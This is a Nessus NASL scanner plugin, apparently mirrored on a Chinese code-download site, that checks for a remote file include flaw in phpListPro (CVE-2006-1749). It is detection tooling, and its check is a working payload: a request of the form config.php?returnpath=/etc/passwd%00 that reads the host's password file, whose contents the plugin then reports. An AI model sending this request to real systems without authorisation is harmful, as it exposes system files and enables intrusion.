⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 phplistpro_remote_file_include.nasl

📁 漏洞扫描源码,可以扫描linux,windows,交换机路由器
💻 NASL
字号:
# kst-gpl## (C) Josh Zlatin-Amishav (josh at ramat dot cc)# GPLv2#  desc["english"] = "Synopsis :The remote web server contains a PHP application that is affected byremote file include vulnerabilities. Description :The remote host is running phpListPro, a web site voting/ranking toolwritten in PHP. The installed version of phpListPro fails to sanitize user input tothe 'returnpath' parameter of the 'config.php', 'editsite.php','addsite.php', and 'in.php' scripts before using it to include PHPcode from other files.  An unauthenticated attacker may be able toread arbitrary local files or include a file from a remote host thatcontains commands which will be executed on the remote host subject tothe privileges of the web server process. These flaws are only exploitable if PHP's 'register_globals' isenabled. See also : http://archives.neohapsis.com/archives/bugtraq/2006-04/0206.htmlhttp://archives.neohapsis.com/archives/bugtraq/2006-05/0153.htmlhttp://archives.neohapsis.com/archives/bugtraq/2006-05/0199.htmlhttp://www.smartisoft.com/forum/viewtopic.php?t=3019Solution : Edit the affected files as discussed in the vendor advisory above.Risk factor : High / CVSS Base Score : 7.5(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";if (description) {  script_id(80077);;  script_version("$Revision: 1.5 $");  script_bugtraq_id(17448);  script_cve_id("CVE-2006-1749");  if (defined_func("script_xref")) script_xref(name:"OSVDB", value:"24540");  name["english"] = "phpListPro returnpath Remote File Include Vulnerabilities";  script_name(english:name["english"]);   script_description(english:desc["english"]);   summary["english"] = "Checks for file includes in phpListPro's config.php";  script_summary(english:summary["english"]);   script_category(ACT_ATTACK);  script_family(english:"CGI abuses");  script_copyright(english:"This script is Copyright (C) 2006 Josh Zlatin-Amishav");  script_dependencie("http_version.nasl");  script_require_ports("Services/www", 80);  script_exclude_keys("Settings/disable_cgi_scanning");  exit(0);}include("global_settings.inc");include("http_func.inc");include("http_keepalive.inc");port = get_http_port(default:80);if (!get_port_state(port)) exit(0);if (!can_host_php(port:port)) exit(0);# Loop through various directories.## Google for '"PHPListPro Ver"|intitle:"rated TopList"'.if (thorough_tests) dirs = make_list("/phplistpro", "/toplist", "/topsite", cgi_dirs());else dirs = make_list(cgi_dirs());foreach dir (dirs) {  # Try to exploit the flaw in config.php to read /etc/passwd.  req = http_get(    item:string(      dir, "/config.php?",      "returnpath=/etc/passwd%00"    ),     port:port  );  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);  if (res == NULL) exit(0);  # There's a problem if...  if (      # there's an entry for root or...      egrep(pattern:"root:.*:0:[01]:", string:res) ||      # we get an error saying "Failed opening".      egrep(string:res, pattern:"Failed opening required '/etc/passwd\\0lang_.+")  ) {    if (egrep(pattern:"root:.*:0:[01]:", string:res)) content = res;    if (content)      report = string(        desc["english"],        "\n\n",        "Plugin output :\n",        "\n",        "Here are the repeated contents of the file '/etc/passwd' that\n",        "Nessus was able to read from the remote host :\n",        "\n",        content      );    else report = desc["english"];    security_hole(port:port, data:report);    exit(0);  }}

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -